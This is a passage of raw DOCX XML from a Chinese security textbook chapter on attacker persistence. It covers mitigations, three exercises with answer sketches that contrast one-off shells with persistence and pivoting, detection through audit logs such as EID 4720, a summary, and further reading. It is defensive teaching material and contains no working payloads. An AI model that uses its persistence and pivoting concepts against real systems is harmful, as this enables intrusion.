      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1193"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">补丁管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者在获取进行持久化所需的初始权限时，可能利用了系统或软件漏洞（见第14章）。一体化、自动化的补丁管理流程能极大抬高攻击者的利用门槛。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1193"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络分段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：如第18.1节所述，强大的内网分段策略可以限制攻击者从已失陷主机向其他系统横向移动的能力，从而限制了持久化的波及范围，也减少了攻击者寻找更优位置（如域控制器）建立驻留的机会。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="321"/>
    <w:bookmarkStart w:id="322" w:name="习题-17"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">18.2.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下习题旨在通过提取性思考和靶机迁移练习，巩固对持久化原理及检测的理解。所有实操均应在本地的隔离实验环境或授权靶机上进行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1（提取题）：持久化机制的本质</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者建立持久化，与一次性执行恶意代码（如直接运行一个反向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell）在行为逻辑上有何根本不同？请从“时间性”和“系统集成度”两个角度，分析为何持久化会留下更多可被蓝队检测的痕迹。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：思考一次性</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">存活的生命周期，与需要伴随系统启动而自动执行的配置、账户或服务在系统稳态中所占据的位置。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答概要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：一次性执行往往仅产生瞬时的进程和网络连接，一旦进程结束，其在内存中的痕迹便消失。持久化则需要修改系统的预定义启动路径（文件系统、注册表、任务计划库、账户数据库等），这些修改是静态且持续存在于磁盘或配置存储中的，它们的生命周期伴随系统，因此一定会经过文件系统监控、日志记录等静态采集点。这构成了持久化检测的根本优势。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在你的靶机环境中，找出至少三个不同的、能让代码在系统启动时自动执行的合法机制。将这些机制列成表，在后续的蓝队演练中，针对每一位置手动创建一个无害的标记文件，然后用你学到的检测命令（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-StartupCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、导出计划任务、查看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cron）来定位这个标记文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2（提取题）：Pivoting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">与持久化的关系</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在18.1节中，我们讨论了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pivoting（内网枢轴）。请解释为什么在一个多网段隔离的内网中，仅在一台</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器上获得临时</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而不实施任何持久化，攻击者的内网横向移动（lateral</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">movement）是极其脆弱的？如果攻击者在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器上成功添加了一个计划任务作为持久化，这对其后续</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pivoting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供了怎样的保障？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：考虑临时</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">依赖于什么条件，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接、Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话等，以及这些条件在系统重启后的状态。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答概要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：临时的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话完全依赖于进程在内存中的存活状态。一旦</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器因运维重启、异常崩溃，或者网络连接中断，攻击者的立足点即告丧失，所有正在进行的横向扫描和攻击链条将全部中断，并且攻击者需要重新进行完整的入侵链才能回归。而一个基于计划任务的持久化方案，使得攻击者在系统重启后能自动重新获得控制权，这意味着其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pivoting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通道（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOCKS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理、端口转发等）可以被再次自动建立，使横向移动成为一个可持续的过程，大大增强攻击链的鲁棒性。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在授权靶机中，结合18.1节的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pivoting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">概念，设计一个简单的实验：先通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接到靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A，假设靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以访问靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">B。然后，在不建立持久化的情况下，断开与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的连接。再重新建立连接，观察你是否能不做任何额外枚举就直接恢复对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的访问？接着，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上模拟建立一个持久化检测基线（即，在一个文件中记录当前所有计划任务的状态），为后续“检测攻击者的计划任务修改”做好工具准备。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3（提取题）：检测策略对比</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：针对“创建一个新的本地管理员账户”这种持久化行为，分析为何仅靠杀毒软件扫描（查找恶意文件）是无法检测到的，而必须依赖于安全日志审计和账户完整性基线管理？请从“行为的合法性与恶意性模糊”的角度进行论述。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：创建一个本地管理员账户这一操作本身，是否是操作系统的一个标准功能？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">net user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等系统工具本身是否为恶意软件？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答概要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：添加用户是操作系统的一个标准管理功能，其使用的工具（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">net user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">useradd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）是合法系统工具，操作本身不包含任何传统意义上的恶意代码。杀毒软件主要检测具有已知恶意特征码的文件，而这一行为没有文件落地，几乎不可能被文件扫描引擎发现。这属于一种“离地生活”（Living</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> off the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Land）的攻击手法。因此，检测必须转向行为层面：这一行为是通过什么进程发起的？进程是否具备合法的管理上下文？账户被创建的时间和频率是否符合基线？这些问题都只能通过完整的日志审计（如监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4720）和账户管理的基线对照来回答。这正是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EDR/XDR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发挥能力的领域。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在你的靶机实验环境中，开启本地安全审计策略（如在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中开启“审计账户管理”策略，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中适当配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auditd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。手动创建一个新账户，然后在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的事件查看器安全日志中查找</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4720，或在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/audit/audit.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中找到相关记录。学习如何设置一条简单的告警规则（例如在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ELK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中），当类似事件再次发生时发出通知。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="322"/>
    <w:bookmarkStart w:id="323" w:name="小结-21"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">18.2.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1194"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">持久化的本质是攻击者对系统自动执行路径的滥用，其目的在于维持立足点的长期可靠，内网枢轴（Pivoting）与横向移动必须依赖持久化才能构建稳定的攻击链。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1194"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">常见持久化策略包括利用启动目录、计划任务/cron、账户操纵和系统服务，所有操作均利用了操作系统的合法功能，形成“离地生活”攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1194"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">持久化行为必然在文件系统、注册表、计划任务库、安全日志及账户数据库中留下静态、可审计的痕迹，这是防守方进行检测的基础。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1194"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测持久化的核心策略是构建一条持续的监控流水线：通过文件完整性监控（FIM）、安全日志聚合与异常检测、计划任务和账户基线比对，发现偏离基准的配置和行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1194"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">抵御持久化攻击的根本在于纵深防御和最小权限原则。通过应用白名单、补丁管理、严格的特权访问管理和内网分段，可以极端地压缩攻击者即使获取初始权限后，建立任何持久化机制的空间和可能。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="323"/>
    <w:bookmarkStart w:id="324" w:name="延伸阅读-10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">18.2.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为深化对持久化检测和防御闭环的理解，推荐读者进一步阅读以下严格筛选的权威资料，它们均来自在蓝队实战和攻击行为分析领域被广泛认可的作者或组织：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">知识库（attack.mitre.org），尤其是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Persistence </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">策略（TA0003）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Lateral Movement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">策略（TA0008）下的技术族，其中对每一项技术均提供了检测建议和数据源列表，是构建检测规则库的首选参考。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Bejtlich, Richard. 《The Practice of Network Security Monitoring: Understanding Incident Detection and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Response》。该书系统阐述了通过网络取证和主机取证进行事件检测的方法论，与本节强调的日志审计、FIM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和行为监控一脉相承。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
